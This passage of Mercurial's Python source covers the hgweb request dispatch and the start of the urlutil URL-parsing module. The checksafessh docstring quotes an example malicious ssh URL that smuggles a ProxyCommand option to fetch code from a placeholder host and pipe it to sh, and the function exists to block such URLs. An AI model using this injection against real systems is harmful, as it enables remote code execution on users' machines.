    wsgicgi_inner as wsgicgi,
)


def getstyle(req, configfn, templatepath):
    styles = (
        req.qsparams.get(b'style', None),
        configfn(b'web', b'style'),
        b'paper',
    )
    return styles, _stylemap(styles, templatepath)


def _stylemap(styles, path=None):
    """Return path to mapfile for a given style.

    Searches mapfile in the following locations:
    1. templatepath/style/map
    2. templatepath/map-style
    3. templatepath/map
    """

    for style in styles:
        # only plain name is allowed to honor template paths
        if (
            not style
            or style in (pycompat.oscurdir, pycompat.ospardir)
            or pycompat.ossep in style
            or pycompat.osaltsep
            and pycompat.osaltsep in style
        ):
            continue
        locations = (os.path.join(style, b'map'), b'map-' + style, b'map')

        for location in locations:
            mapfile, fp = templater.try_open_template(location, path)
            if mapfile:
                return style, mapfile, fp

    raise RuntimeError(b"No hgweb templates found in %r" % path)


def makebreadcrumb(url, prefix=b''):
    """Return a 'URL breadcrumb' list

    A 'URL breadcrumb' is a list of URL-name pairs,
    corresponding to each of the path items on a URL.
    This can be used to create path navigation entries.
    """
    if url.endswith(b'/'):
        url = url[:-1]
    if prefix:
        url = b'/' + prefix + url
    relpath = url
    if relpath.startswith(b'/'):
        relpath = relpath[1:]

    breadcrumb = []
    urlel = url
    pathitems = [b''] + relpath.split(b'/')
    for pathel in reversed(pathitems):
        if not pathel or not urlel:
            break
        breadcrumb.append({b'url': urlel, b'name': pathel})
        urlel = os.path.dirname(urlel)
    return templateutil.mappinglist(reversed(breadcrumb))


class requestcontext:
    """Holds state/context for an individual request.

    Servers can be multi-threaded. Holding state on the WSGI application
    is prone to race conditions. Instances of this class exist to hold
    mutable and race-free state for requests.
    """

    # Not initialized until hgweb._runwsgi() runs
    tmpl: templater.templater

    def __init__(self, app, repo, req, res):
        self.repo = repo
        self.reponame = app.reponame
        self.req = req
        self.res = res

        # Only works if the filter actually support being upgraded to show
        # visible changesets
        current_filter = repo.filtername
        if (
            common.hashiddenaccess(repo, req)
            and current_filter is not None
            and current_filter + b'.hidden' in repoview.filtertable
        ):
            self.repo = self.repo.filtered(repo.filtername + b'.hidden')

        self.maxchanges = self.configint(b'web', b'maxchanges')
        self.stripecount = self.configint(b'web', b'stripes')
        self.maxshortchanges = self.configint(b'web', b'maxshortchanges')
        self.maxfiles = self.configint(b'web', b'maxfiles')
        self.allowpull = self.configbool(b'web', b'allow-pull')

        # we use untrusted=False to prevent a repo owner from using
        # web.templates in .hg/hgrc to get access to any file readable
        # by the user running the CGI script
        self.templatepath = self.config(b'web', b'templates', untrusted=False)

        # This object is more expensive to build than simple config values.
        # It is shared across requests. The app will replace the object
        # if it is updated. Since this is a reference and nothing should
        # modify the underlying object, it should be constant for the lifetime
        # of the request.
        self.websubtable = app.websubtable

        self.csp, self.nonce = cspvalues(self.repo.ui)

    # Trust the settings from the .hg/hgrc files by default.
    def config(self, *args, **kwargs):
        kwargs.setdefault('untrusted', True)
        return self.repo.ui.config(*args, **kwargs)

    def configbool(self, *args, **kwargs):
        kwargs.setdefault('untrusted', True)
        return self.repo.ui.configbool(*args, **kwargs)

    def configint(self, *args, **kwargs):
        kwargs.setdefault('untrusted', True)
        return self.repo.ui.configint(*args, **kwargs)

    def configlist(self, *args, **kwargs):
        kwargs.setdefault('untrusted', True)
        return self.repo.ui.configlist(*args, **kwargs)

    def archivelist(self, nodeid):
        return webutil.archivelist(self.repo.ui, nodeid)

    def templater(self, req):
        # determine scheme, port and server name
        # this is needed to create absolute urls
        logourl = self.config(b'web', b'logourl')
        logoimg = self.config(b'web', b'logoimg')
        staticurl = (
            self.config(b'web', b'staticurl')
            or req.apppath.rstrip(b'/') + b'/static/'
        )
        if not staticurl.endswith(b'/'):
            staticurl += b'/'

        # figure out which style to use

        vars = {}
        styles, (style, mapfile, fp) = getstyle(
            req, self.config, self.templatepath
        )
        if style == styles[0]:
            vars[b'style'] = style

        sessionvars = webutil.sessionvars(vars, b'?')

        if not self.reponame:
            self.reponame = (
                self.config(b'web', b'name', b'')
                or req.reponame
                or req.apppath
                or self.repo.root
            )

        filters = {}
        templatefilter = registrar.templatefilter(filters)

        @templatefilter(b'websub', intype=bytes)
        def websubfilter(text):
            return templatefilters.websub(text, self.websubtable)

        # create the templater
        # TODO: export all keywords: defaults = templatekw.keywords.copy()
        defaults = {
            b'url': req.apppath + b'/',
            b'logourl': logourl,
            b'logoimg': logoimg,
            b'staticurl': staticurl,
            b'urlbase': req.advertisedbaseurl,
            b'repo': self.reponame,
            b'encoding': encoding.encoding,
            b'sessionvars': sessionvars,
            b'pathdef': makebreadcrumb(req.apppath),
            b'style': style,
            b'nonce': self.nonce,
        }
        templatekeyword = registrar.templatekeyword(defaults)

        @templatekeyword(b'motd', requires=())
        def motd(context, mapping):
            yield self.config(b'web', b'motd')

        tres = formatter.templateresources(self.repo.ui, self.repo)
        return templater.templater.frommapfile(
            mapfile, fp=fp, filters=filters, defaults=defaults, resources=tres
        )

    def sendtemplate(self, name, **kwargs):
        """Helper function to send a response generated from a template."""
        if self.req.method != b'HEAD':
            kwargs = pycompat.byteskwargs(kwargs)
            self.res.setbodygen(self.tmpl.generate(name, kwargs))
        return self.res.sendresponse()


class hgweb:
    """HTTP server for individual repositories.

    Instances of this class serve HTTP responses for a particular
    repository.

    Instances are typically used as WSGI applications.

    Some servers are multi-threaded. On these servers, there may
    be multiple active threads inside __call__.
    """

    def __init__(self, repo: RepoT | bytes, name=None, baseui=None):
        if isinstance(repo, bytes):
            if baseui:
                u = baseui.copy()
            else:
                u = uimod.ui.load()
                extensions.loadall(u)
                extensions.populateui(u)
            r = repo_factory.repository(u, repo)
        else:
            # we trust caller to give us a private copy
            r = repo

        r.ui.setconfig(b'ui', b'report_untrusted', b'off', b'hgweb')
        r.baseui.setconfig(b'ui', b'report_untrusted', b'off', b'hgweb')
        r.ui.setconfig(b'ui', b'nontty', b'true', b'hgweb')
        r.baseui.setconfig(b'ui', b'nontty', b'true', b'hgweb')
        # resolve file patterns relative to repo root
        r.ui.setconfig(b'ui', b'forcecwd', r.root, b'hgweb')
        r.baseui.setconfig(b'ui', b'forcecwd', r.root, b'hgweb')
        # it's unlikely that we can replace signal handlers in WSGI server,
        # and mod_wsgi issues a big warning. a plain hgweb process (with no
        # threading) could replace signal handlers, but we don't bother
        # conditionally enabling it.
        r.ui.setconfig(b'ui', b'signal-safe-lock', b'false', b'hgweb')
        r.baseui.setconfig(b'ui', b'signal-safe-lock', b'false', b'hgweb')
        # displaying bundling progress bar while serving feel wrong and may
        # break some wsgi implementation.
        r.ui.setconfig(b'progress', b'disable', b'true', b'hgweb')
        r.baseui.setconfig(b'progress', b'disable', b'true', b'hgweb')
        self._repos = [hg.cachedlocalrepo(self._webifyrepo(r))]
        self._lastrepo = self._repos[0]
        hook.redirect(True)
        self.reponame = name

    def _webifyrepo(self, repo):
        repo = getwebview(repo)
        self.websubtable = webutil.getwebsubs(repo)
        return repo

    @contextlib.contextmanager
    def _obtainrepo(self):
        """Obtain a repo unique to the caller.

        Internally we maintain a stack of cachedlocalrepo instances
        to be handed out. If one is available, we pop it and return it,
        ensuring it is up to date in the process. If one is not available,
        we clone the most recently used repo instance and return it.

        It is currently possible for the stack to grow without bounds
        if the server allows infinite threads. However, servers should
        have a thread limit, thus establishing our limit.
        """
        if self._repos:
            cached = self._repos.pop()
            r, created = cached.fetch()
        else:
            cached = self._lastrepo.copy()
            r, created = cached.fetch()
        if created:
            r = self._webifyrepo(r)

        self._lastrepo = cached
        self.mtime = cached.mtime
        try:
            yield r
        finally:
            self._repos.append(cached)

    def run(self):
        """Start a server from CGI environment.

        Modern servers should be using WSGI and should avoid this
        method, if possible.
        """
        if not encoding.environ.get(b'GATEWAY_INTERFACE', b'').startswith(
            b"CGI/1."
        ):
            raise RuntimeError(
                b"This function is only intended to be "
                b"called while running as a CGI script."
            )
        wsgicgi.launch(self)

    def __call__(self, env, respond):
        """Run the WSGI application.

        This may be called by multiple threads.
        """
        req = requestmod.parserequestfromenv(env)
        res = requestmod.wsgiresponse(req, respond)

        return self.run_wsgi(req, res)

    def run_wsgi(self, req, res):
        """Internal method to run the WSGI application.

        This is typically only called by Mercurial. External consumers
        should be using instances of this class as the WSGI application.
        """
        with self._obtainrepo() as repo:
            profile = repo.ui.configbool(b'profiling', b'enabled')
            with profiling.profile(repo.ui, enabled=profile):
                yield from self._runwsgi(req, res, repo)

    def _runwsgi(self, req, res, repo):
        rctx = requestcontext(self, repo, req, res)

        # This state is global across all threads.
        encoding.encoding = rctx.config(b'web', b'encoding')
        rctx.repo.ui.environ = req.rawenv

        if rctx.csp:
            # hgwebdir may have added CSP header. Since we generate our own,
            # replace it.
            res.headers[b'Content-Security-Policy'] = rctx.csp

        handled = wireprotoserver.handlewsgirequest(
            rctx, req, res, self.check_perm
        )
        if handled:
            return res.sendresponse()

        # Old implementations of hgweb supported dispatching the request via
        # the initial query string parameter instead of using PATH_INFO.
        # If PATH_INFO is present (signaled by ``req.dispatchpath`` having
        # a value), we use it. Otherwise fall back to the query string.
        if req.dispatchpath is not None:
            query = req.dispatchpath
        else:
            query = req.querystring.partition(b'&')[0].partition(b';')[0]

        # translate user-visible url structure to internal structure

        args = query.split(b'/', 2)
        if b'cmd' not in req.qsparams and args and args[0]:
            cmd = args.pop(0)
            style = cmd.rfind(b'-')
            if style != -1:
                req.qsparams[b'style'] = cmd[:style]
                cmd = cmd[style + 1 :]

            # avoid accepting e.g. style parameter as command
            if hasattr(webcommands, pycompat.sysstr(cmd)):
                req.qsparams[b'cmd'] = cmd

            if cmd == b'static':
                req.qsparams[b'file'] = b'/'.join(args)
            else:
                if args and args[0]:
                    node = args.pop(0).replace(b'%2F', b'/')
                    req.qsparams[b'node'] = node
                if args:
                    if b'file' in req.qsparams:
                        del req.qsparams[b'file']
                    for a in args:
                        req.qsparams.add(b'file', a)

            ua = req.headers.get(b'User-Agent', b'')
            if cmd == b'rev' and b'mercurial' in ua:
                req.qsparams[b'style'] = b'raw'

            if cmd == b'archive':
                fn = req.qsparams[b'node']
                for type_, spec in webutil.archivespecs.items():
                    ext = spec[2]
                    if fn.endswith(ext):
                        req.qsparams[b'node'] = fn[: -len(ext)]
                        req.qsparams[b'type'] = type_
        else:
            cmd = req.qsparams.get(b'cmd', b'')

        # process the web interface request

        try:
            rctx.tmpl = rctx.templater(req)
            ctype = rctx.tmpl.render(
                b'mimetype', {b'encoding': encoding.encoding}
            )

            # check read permissions non-static content
            if cmd != b'static':
                self.check_perm(rctx, req, None)

            if cmd == b'':
                req.qsparams[b'cmd'] = rctx.tmpl.render(b'default', {})
                cmd = req.qsparams[b'cmd']

            # Don't enable caching if using a CSP nonce because then it wouldn't
            # be a nonce.
            if rctx.configbool(b'web', b'cache') and not rctx.nonce:
                tag = b'W/"%d"' % self.mtime
                if req.headers.get(b'If-None-Match') == tag:
                    res.status = b'304 Not Modified'
                    # Content-Type may be defined globally. It isn't valid on a
                    # 304, so discard it.
                    try:
                        del res.headers[b'Content-Type']
                    except KeyError:
                        pass
                    # Response body not allowed on 304.
                    res.setbodybytes(b'')
                    return res.sendresponse()

                res.headers[b'ETag'] = tag

            if pycompat.sysstr(cmd) not in webcommands.__all__:
                msg = b'method not found'
                # /!\ Do not print `cmd` here unless you do *extensive*
                # escaping.
                # Because XSS escaping is hard, we just don't risk it.
                raise ErrorResponse(HTTP_BAD_REQUEST, msg)
            else:
                # Set some globals appropriate for web handlers. Commands can
                # override easily enough.
                res.status = b'200 Script output follows'
                res.headers[b'Content-Type'] = ctype
                return getattr(webcommands, pycompat.sysstr(cmd))(rctx)

        except (error.LookupError, error.RepoLookupError) as err:
            msg = pycompat.bytestr(err)
            if hasattr(err, 'name') and not isinstance(
                err, error.ManifestLookupError
            ):
                msg = b'revision not found: %s' % err.name

            res.status = b'404 Not Found'
            res.headers[b'Content-Type'] = ctype
            return rctx.sendtemplate(b'error', error=msg)
        except (error.RepoError, error.StorageError) as e:
            res.status = b'500 Internal Server Error'
            res.headers[b'Content-Type'] = ctype
            return rctx.sendtemplate(b'error', error=pycompat.bytestr(e))
        except error.Abort as e:
            res.status = b'403 Forbidden'
            res.headers[b'Content-Type'] = ctype
            return rctx.sendtemplate(b'error', error=e.message)
        except ErrorResponse as e:
            for k, v in e.headers:
                res.headers[k] = v
            res.status = statusmessage(e.code, pycompat.bytestr(e))
            res.headers[b'Content-Type'] = ctype
            return rctx.sendtemplate(b'error', error=pycompat.bytestr(e))

    def check_perm(self, rctx, req, op):
        for permhook in permhooks:
            permhook(rctx, req, op)


def getwebview(repo):
    """The 'web.view' config controls changeset filter to hgweb. Possible
    values are ``served``, ``visible`` and ``all``. Default is ``served``.
    The ``served`` filter only shows changesets that can be pulled from the
    hgweb instance.  The``visible`` filter includes secret changesets but
    still excludes "hidden" one.

    See the repoview module for details.

    The option has been around undocumented since Mercurial 2.5, but no
    user ever asked about it. So we better keep it undocumented for now."""
    # experimental config: web.view
    viewconfig = repo.ui.config(b'web', b'view', untrusted=True)
    if viewconfig == b'all':
        return repo.unfiltered()
    elif viewconfig in repoview.filtertable:
        return repo.filtered(viewconfig)
    else:
        return repo.filtered(b'served')



# utils.urlutil - code related to [paths] management
#
# Copyright 2005-2023 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import annotations

import os
import re as remod
import socket

from typing import (
    Callable,
    Collection,
)

from ..i18n import _
from ..node import hex
from ..interfaces.types import (
    Capabilities,
    PeerT,
    RepoT,
)
from .. import (
    encoding,
    error,
    pycompat,
    urllibcompat,
)

from . import (
    stringutil,
)

from ..interfaces import (
    misc as int_misc,
)

from ..revlogutils import (
    constants as revlog_constants,
)

# keeps pyflakes happy
assert [
    Callable,
]

urlreq = urllibcompat.urlreq


def getport(port: bytes | int) -> int:
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except OSError:
        raise error.Abort(
            _(b"no port number associated with service '%s'") % port
        )


class url(int_misc.IUrl):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = b"!~*'()+"
    _safepchars = b"/!~*'()+:\\"
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(
        self,
        path: bytes,
        parsequery: bool = True,
        parsefragment: bool = True,
    ) -> None:
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = b''
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and b'?' in path:
                path, self.query = path.split(b'?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith(b'//'):
                parts = path[2:].split(b'/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = b'/' + path

            if self.host and b'@' in self.host:
                self.user, self.host = self.host.rsplit(b'@', 1)
                if b':' in self.user:
                    self.user, self.passwd = self.user.split(b':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (
                self.host
                and b':' in self.host
                and not (
                    self.host.startswith(b'[') and self.host.endswith(b']')
                )
            ):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(b':', 1)
                if not self.host:
                    self.host = None

            if (
                self.host
                and self.scheme == b'file'
                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
            ):
                raise error.Abort(
                    _(b'file:// URLs can only refer to localhost')
                )

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port', 'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def copy(self) -> url:
        u = url(b'temporary useless value')
        u.path = self.path
        u.scheme = self.scheme
        u.user = self.user
        u.passwd = self.passwd
        u.host = self.host
        u.port = self.port
        u.query = self.query
        u.fragment = self.fragment
        u._localpath = self._localpath
        u._hostport = self._hostport
        u._origpath = self._origpath
        return u

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in (
            'scheme',
            'user',
            'passwd',
            'host',
            'port',
            'path',
            'query',
            'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                line = b'%s: %r'
                line %= (pycompat.bytestr(a), pycompat.bytestr(v))
                attrs.append(line)
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self) -> int_misc.AuthInfoT:
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self) -> bool:
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self) -> bytes:
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self) -> bool:
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )


def hasscheme(path: bytes) -> bool:
    return bool(url(path).scheme)  # cast to help pytype


def hasdriveletter(path: bytes) -> bool:
    return bool(path) and path[1:2] == b':' and path[0:1].isalpha()


def urllocalpath(path: bytes) -> bytes:
    return url(path, parsequery=False, parsefragment=False).localpath()


def checksafessh(path: bytes) -> None:
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
        raise error.Abort(
            _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
        )


def hidepassword(u: bytes) -> bytes:
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = b'***'
    return bytes(u)


def removeauth(u: bytes) -> bytes:
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)


def list_paths(ui, target_path=None):
    """list all the (name, paths) in the passed ui"""
    result = []
    if target_path is None:
        for name, paths in sorted(ui.paths.items()):
            for p in paths:
                result.append((name, p))

    else:
        for path in ui.paths.get(target_path, []):
            result.append((target_path, path))
    return result


def try_path(ui, url):
    """try to build a path from a url

    Return None if no Path could built.
    """
    try:
        # we pass the ui instance are warning might need to be issued
        return path(ui, None, rawloc=url)
    except ValueError:
        return None


def get_push_paths(repo, ui, dests):
    """yields all the `path` selected as push destination by `dests`"""
    if not dests:
        if b'default-push' in ui.paths:
            for p in ui.paths[b'default-push']:
                yield p.get_push_variant()
        elif b'default' in ui.paths:
            for p in ui.paths[b'default']:
                yield p.get_push_variant()
        else:
            raise error.ConfigError(
                _(b'default repository not configured!'),
                hint=_(b"see 'hg help config.paths'"),
            )
    else:
        for dest in dests:
            if dest in ui.paths:
                for p in ui.paths[dest]:
                    yield p.get_push_variant()
            else:
                path = try_path(ui, dest)
                if path is None:
                    msg = _(b'repository %s does not exist')
                    msg %= dest
                    raise error.RepoError(msg)
                yield path.get_push_variant()


def get_pull_paths(repo, ui, sources):
    """yields all the `(path, branch)` selected as pull source by `sources`"""
    if not sources:
        sources = [b'default']
    for source in sources:
        if source in ui.paths:
            for p in ui.paths[source]:
                yield p
        else:
            p = path(ui, None, source, validate_path=False)
            yield p


def get_unique_push_path(action, repo, ui, dest=None):
    """return a unique `path` or abort if multiple are found

    This is useful for command and action that does not support multiple
    destination (yet).

    The `action` parameter will be used for the error message.
    """
    if dest is None:
        dests = []
    else:
        dests = [dest]
    dests = list(get_push_paths(repo, ui, dests))
    if len(dests) != 1:
        if dest is None:
            msg = _(
                b"default path points to %d urls while %s only supports one"
            )
            msg %= (len(dests), action)
        else:
            msg = _(b"path points to %d urls while %s only supports one: %s")
            msg %= (len(dests), action, dest)
        raise error.Abort(msg)
    return dests[0]


def get_unique_pull_path_obj(action, ui, source=None):
    """return a unique `(path, branch)` or abort if multiple are found

    This is useful for command and action that does not support multiple
    destination (yet).

    The `action` parameter will be used for the error message.

    note: Ideally, this function would be called `get_unique_pull_path` to
    mirror the `get_unique_push_path`, but the name was already taken.
    """
    sources = []
    if source is not None:
        sources.append(source)

    pull_paths = list(get_pull_paths(None, ui, sources=sources))
    path_count = len(pull_paths)
    if path_count != 1:
        if source is None:
            msg = _(
                b"default path points to %d urls while %s only supports one"
            )
            msg %= (path_count, action)
        else:
            msg = _(b"path points to %d urls while %s only supports one: %s")
            msg %= (path_count, action, source)
        raise error.Abort(msg)
    return pull_paths[0]


def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
    """return a unique `(url, branch)` or abort if multiple are found

    See `get_unique_pull_path_obj` for details.
    """
    path = get_unique_pull_path_obj(action, ui, source=source)
    return parseurl(path.rawloc, default_branches)


def get_clone_path_obj(ui, source):
    """return the `(origsource, url, branch)` selected as clone source"""
    if source == b'':
        return None
    return get_unique_pull_path_obj(b'clone', ui, source=source)


def get_clone_path(ui, source, default_branches=None):
    """return the `(origsource, url, branch)` selected as clone source"""
    path = get_clone_path_obj(ui, source)
    if path is None:
        return (b'', b'', (None, default_branches))
    if default_branches is None:
        default_branches = []
    branches = (path.branch, default_branches)
    return path.rawloc, path.loc, branches


def parseurl(path, branches=None):
    '''parse url#branch, returning (url, (branch, branches))'''
    u = url(path)
    branch = None
    if u.fragment:
        branch = u.fragment
        u.fragment = None
    return bytes(u), (branch, branches or [])


class paths(dict):
    """Represents a collection of paths and their configs.

    Data is initially derived from ui instances and the config files they have
    loaded.
    """

    def __init__(self, ui):
        dict.__init__(self)

        home_path = os.path.expanduser(b'~')

        for name, value in ui.configitems(b'paths', ignoresub=True):
            # No location is the same as not existing.
            if not value:
                continue
            _value, sub_opts = ui.configsuboptions(b'paths', name)
            s = ui.configsource(b'paths', name)
            root_key = (name, value, s)
            root = ui._path_to_root.get(root_key, home_path)

            multi_url = sub_opts.get(b'multi-urls')
            if multi_url is not None and stringutil.parsebool(multi_url):
                base_locs = stringutil.parselist(value)
            else:
                base_locs = [value]

            paths = []
            for loc in base_locs:
                loc = os.path.expandvars(loc)
                loc = os.path.expanduser(loc)
                if not hasscheme(loc) and not os.path.isabs(loc):
                    loc = os.path.normpath(os.path.join(root, loc))
                p = path(ui, name, rawloc=loc, suboptions=sub_opts)
                paths.append(p)
            self[name] = paths

        for name, old_paths in sorted(self.items()):
            new_paths = []
            for p in old_paths:
                new_paths.extend(_chain_path(p, ui, self))
            self[name] = new_paths


_pathsuboptions: dict[bytes, tuple[str, Callable]] = {}
# a dictionnary of methods that can be used to format a sub-option value
path_suboptions_display = {}


def pathsuboption(option: bytes, attr: str, display=pycompat.bytestr):
    """Decorator used to declare a path sub-option.

    Arguments are the sub-option name and the attribute it should set on
    ``path`` instances.

    The decorated function will receive as arguments a ``ui`` instance,
    ``path`` instance, and the string value of this option from the config.
    The function should return the value that will be set on the ``path``
    instance.

    The optional `display` argument is a function that can be used to format
    the value when displayed to the user (like in `hg paths` for example).

    This decorator can be used to perform additional verification of
    sub-options and to change the type of sub-options.
    """
    if isinstance(attr, bytes):
        msg = b'pathsuboption take `str` as "attr" argument, not `bytes`'
        raise TypeError(msg)

    def register(func):
        _pathsuboptions[option] = (attr, func)
        path_suboptions_display[option] = display
        return func

    return register


def display_bool(value):
    """display a boolean suboption back to the user"""
    return b'yes' if value else b'no'


@pathsuboption(b'pushurl', '_pushloc')
def pushurlpathoption(ui, path, value):
    u = url(value)
    # Actually require a URL.
    if not u.scheme:
